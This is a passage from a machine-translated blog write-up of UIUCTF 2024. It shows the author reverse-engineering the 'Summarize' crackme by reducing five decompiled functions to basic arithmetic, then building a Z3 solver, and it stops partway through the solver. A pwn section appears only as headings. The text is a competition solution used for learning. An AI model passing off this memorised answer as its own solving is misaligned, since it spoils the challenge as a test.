{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-uiuctf-2024-en","result":{"data":{"markdownRemark":{"id":"2262684f-cbb8-541f-8526-9d29c3f15cf9","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-uiuctf-2024\">original page</a>.</p>\n</blockquote>\n<h2 id=\"table-of-contents\">Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#summarizerev\">Summarize(Rev)</a></p>\n<ul>\n<li><a href=\"#func1\">FUNC1</a></li>\n<li><a href=\"#func2\">FUNC2</a></li>\n<li><a href=\"#func3\">FUNC3</a></li>\n<li><a href=\"#func4\">FUNC4</a></li>\n<li><a href=\"#func5\">FUNC5</a></li>\n<li><a href=\"#creating-the-solver\">Creating the Solver</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#syscallspwn\">Syscalls(Pwn)</a></p>\n<ul>\n<li><a href=\"#solution-1-using-openat-preadv2-and-pwritev2-with-an-iovec\">Solution 1: Using openat, preadv2, and pwritev2 with an iovec</a></li>\n<li><a href=\"#solution-2-using-openat-mmap-and-pwritev2-with-an-iovec\">Solution 2: Using openat, mmap, and pwritev2 with an iovec</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"summarizerev\">Summarize(Rev)</h2>\n<blockquote>\n<p>All you have to do is find six numbers. How hard can that be?</p>\n</blockquote>\n<p>When I analyzed the challenge binary with a decompiler, I found that it was a program that accepts the integers A through F as input values and verifies them with the <code class=\"language-text\">check</code> function.</p>\n<p><img src=\"/static/61bb20520b0baa216ffbf85647374dd9/cecac/image-20240707134745268.png\" alt=\"image-20240707134745268\" /></p>\n<p>The <code class=\"language-text\">check</code> function is implemented as follows. It passes the input integers to <code class=\"language-text\">FUNC1</code> through <code class=\"language-text\">FUNC5</code>, performs a series of calculations, and evaluates the results.</p>\n<p><img src=\"/static/8ef810ef625aa2b93cadbbdf06fba277/7131f/image-20240707140123074.png\" alt=\"image-20240707140123074\" /></p>\n<p>From here, let’s look at what each function does in order.</p>\n<h3 id=\"func1\">FUNC1</h3>\n<p><code class=\"language-text\">FUNC1</code> takes two arguments, negates the second one, and calls <code class=\"language-text\">FUNC2</code> with the result.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token
keyword\">void</span> <span class=\"token function\">FUNC1</span><span class=\"token punctuation\">(</span>undefined4 param_1<span class=\"token punctuation\">,</span><span class=\"token keyword\">int</span> param_2<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>param_1<span class=\"token punctuation\">,</span><span class=\"token operator\">-</span>param_2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<h3 id=\"func2\">FUNC2</h3>\n<p><code class=\"language-text\">FUNC2</code> performs the following calculation.</p>\n<p>On every iteration it shifts both of its arguments right by one bit, and the loop keeps running until both values have become 0.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">long</span> <span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>uint x<span class=\"token punctuation\">,</span>uint y<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  uint m<span class=\"token punctuation\">;</span>\n  
uint n<span class=\"token punctuation\">;</span>\n  uint Y<span class=\"token punctuation\">;</span>\n  uint X<span class=\"token punctuation\">;</span>\n  uint L<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> K<span class=\"token punctuation\">;</span>\n  byte b<span class=\"token punctuation\">;</span>\n  \n  K <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  L <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  b <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  X <span class=\"token operator\">=</span> x<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span>Y <span class=\"token operator\">=</span> y<span class=\"token punctuation\">;</span> <span class=\"token punctuation\">(</span>X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    m <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    n <span class=\"token operator\">=</span> Y <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    X <span class=\"token operator\">=</span> 
X <span class=\"token operator\">>></span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n    K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>m <span class=\"token operator\">^</span> n <span class=\"token operator\">^</span> L<span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    L <span class=\"token operator\">=</span> n <span class=\"token operator\">&amp;</span> L <span class=\"token operator\">|</span> m <span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span>n <span class=\"token operator\">|</span> L<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>ulong<span class=\"token punctuation\">)</span>L <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x3f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>I wanted to rewrite this 
computation as a Python script so that I could solve it with Z3, but I couldn’t build a good Z3Py solver because I would need to implement a loop whose termination condition depends on symbolic variables.</p>\n<p>So I considered reducing the calculation inside this function to a simple expression that does not use a loop.</p>\n<p>I did not have enough reverse-engineering skill to identify this function’s structure through static analysis, but this function is simply performing addition on two variables.</p>\n<p>In fact, when I tested the following Python reimplementation of the code, even after running the calculation 1,000 times with random values, every result was equal to <code class=\"language-text\">A + B</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    K <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    L <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    Y <span class=\"token operator\">=</span> y\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token keyword\">or</span> Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        m <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span>\n        n <span class=\"token operator\">=</span> Y <span class=\"token operator\">&amp;</span> <span 
class=\"token number\">1</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>m <span class=\"token operator\">^</span> n <span class=\"token operator\">^</span> L<span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        L <span class=\"token operator\">=</span> n <span class=\"token operator\">&amp;</span> L <span class=\"token operator\">|</span> m <span class=\"token operator\">&amp;</span> <span class=\"token punctuation\">(</span>n <span class=\"token operator\">|</span> L<span class=\"token punctuation\">)</span>\n        b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>L <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x3f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">from</span> random <span class=\"token keyword\">import</span> randint\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token 
number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC2<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">+</span> B\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Since <code class=\"language-text\">FUNC2</code> is an addition operation, it follows that <code class=\"language-text\">FUNC1</code> is a subtraction operation.</p>\n<h3 id=\"func3\">FUNC3</h3>\n<p>The following test code is a Python translation of <code class=\"language-text\">FUNC3</code>.</p>\n<p>This code
also turns out to do nothing more than multiplication.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC3</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    K <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>y <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token punctuation\">(</span>X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> K\n\n<span class=\"token keyword\">from</span> random <span class=\"token keyword\">import</span> randint\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token 
punctuation\">(</span><span class=\"token number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC3<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">*</span> B\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"func4\">FUNC4</h3>\n<p>This one is relatively easy to understand even from the original code, and we can see that it is a function that performs XOR.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code
class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC4</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    K <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    Y <span class=\"token operator\">=</span> y\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token keyword\">or</span> Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        n <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        K <span class=\"token operator\">=</span> K <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>n <span class=\"token operator\">^</span> <span class=\"token punctuation\">(</span>Y <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        b <span class=\"token operator\">=</span> b <span 
class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> K\n\n<span class=\"token keyword\">from</span> random <span class=\"token keyword\">import</span> randint\n\n<span class=\"token comment\"># FUNC4</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC4<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">^</span> B\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"func5\">FUNC5</h3>\n<p>This function has almost the same structure as <code class=\"language-text\">FUNC4</code>, and we can see that it performs an AND operation.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">def</span> <span class=\"token function\">FUNC5</span><span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">,</span> y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    N <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    b <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n    X <span class=\"token operator\">=</span> x\n    Y <span class=\"token operator\">=</span> y\n    <span class=\"token keyword\">while</span> X <span class=\"token operator\">!=</span> <span class=\"token number\">0</span> <span class=\"token keyword\">or</span> Y <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">:</span>\n        n <span class=\"token operator\">=</span> X <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span>\n        X <span class=\"token operator\">=</span> X <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        N <span class=\"token operator\">=</span> N <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>n <span class=\"token operator\">&amp;</span> Y <span class=\"token operator\">&amp;</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;&lt;</span> <span class=\"token punctuation\">(</span>b <span class=\"token operator\">&amp;</span> <span class=\"token number\">0x1f</span><span class=\"token
punctuation\">)</span><span class=\"token punctuation\">)</span>\n        Y <span class=\"token operator\">=</span> Y <span class=\"token operator\">>></span> <span class=\"token number\">1</span>\n        b <span class=\"token operator\">=</span> b <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">return</span> N\n\n<span class=\"token keyword\">from</span> random <span class=\"token keyword\">import</span> randint\n\n<span class=\"token comment\"># FUNC5</span>\n<span class=\"token keyword\">for</span> i <span class=\"token keyword\">in</span> <span class=\"token builtin\">range</span><span class=\"token punctuation\">(</span><span class=\"token number\">1000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    A <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    B <span class=\"token operator\">=</span> randint<span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">10000</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">assert</span> FUNC5<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> A <span class=\"token operator\">&amp;</span> B\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Finish.\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h3 id=\"creating-the-solver\">Creating the Solver</h3>\n<p>Based on what I confirmed up to this point, I created the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> z3 <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\nA <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"A\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nB <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"B\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nC <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"C\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nD <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"D\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nE <span class=\"token
operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"E\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nF <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"F\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nG <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"G\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\n\na <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"a\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nb <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"b\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"c\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token 
string\">f\"d\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\ne <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"e\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"f\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\ng <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"g\"</span></span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\n\ns <span class=\"token operator\">=</span> Solver<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC1</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">-</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC2</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">+</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token 
function\">FUNC3</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">*</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC4</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">^</span> Y\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">FUNC5</span><span class=\"token punctuation\">(</span>X<span class=\"token punctuation\">,</span>Y<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> X <span class=\"token operator\">&amp;</span> Y\n\n<span class=\"token comment\"># Range num</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>A <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>A <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>B <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">,</span><span class=\"token punctuation\">(</span>B <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>C <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>C <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>D <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>D <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>E <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>E <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>And<span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>F <span class=\"token operator\">&lt;</span> <span class=\"token number\">1000000000</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token punctuation\">(</span>F <span class=\"token operator\">></span> <span class=\"token number\">100000001</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\na <span class=\"token operator\">=</span> FUNC1<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span>\nb <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">,</span>C<span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span>\na <span class=\"token operator\">=</span> FUNC3<span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span>B<span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> FUNC3<span class=\"token punctuation\">(</span><span class=\"token number\">3</span><span class=\"token punctuation\">,</span>A<span class=\"token punctuation\">)</span>\ne <span class=\"token operator\">=</span> FUNC1<span class=\"token punctuation\">(</span>d<span class=\"token punctuation\">,</span>a<span class=\"token punctuation\">)</span>\nf <span class=\"token operator\">=</span> FUNC4<span class=\"token punctuation\">(</span>A<span class=\"token punctuation\">,</span>D<span 
class=\"token punctuation\">)</span>\na <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>C<span class=\"token punctuation\">,</span>A<span class=\"token punctuation\">)</span>\ng <span class=\"token operator\">=</span> FUNC5<span class=\"token punctuation\">(</span>B<span class=\"token punctuation\">,</span>a<span class=\"token punctuation\">)</span>\nh <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>B<span class=\"token punctuation\">,</span>D<span class=\"token punctuation\">)</span>\na <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>D<span class=\"token punctuation\">,</span>F<span class=\"token punctuation\">)</span>\ni <span class=\"token operator\">=</span> FUNC4<span class=\"token punctuation\">(</span>C<span class=\"token punctuation\">,</span>a<span class=\"token punctuation\">)</span>\nj <span class=\"token operator\">=</span> FUNC1<span class=\"token punctuation\">(</span>E<span class=\"token punctuation\">,</span>F<span class=\"token punctuation\">)</span>\nk <span class=\"token operator\">=</span> FUNC2<span class=\"token punctuation\">(</span>E<span class=\"token punctuation\">,</span>F<span class=\"token punctuation\">)</span>\n\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>\n    And<span class=\"token punctuation\">(</span>\n        <span class=\"token punctuation\">(</span>b <span class=\"token operator\">%</span> <span class=\"token number\">0x10ae961</span> <span class=\"token operator\">==</span> <span class=\"token number\">0x3f29b9</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n        <span class=\"token punctuation\">(</span>c <span class=\"token operator\">%</span> <span 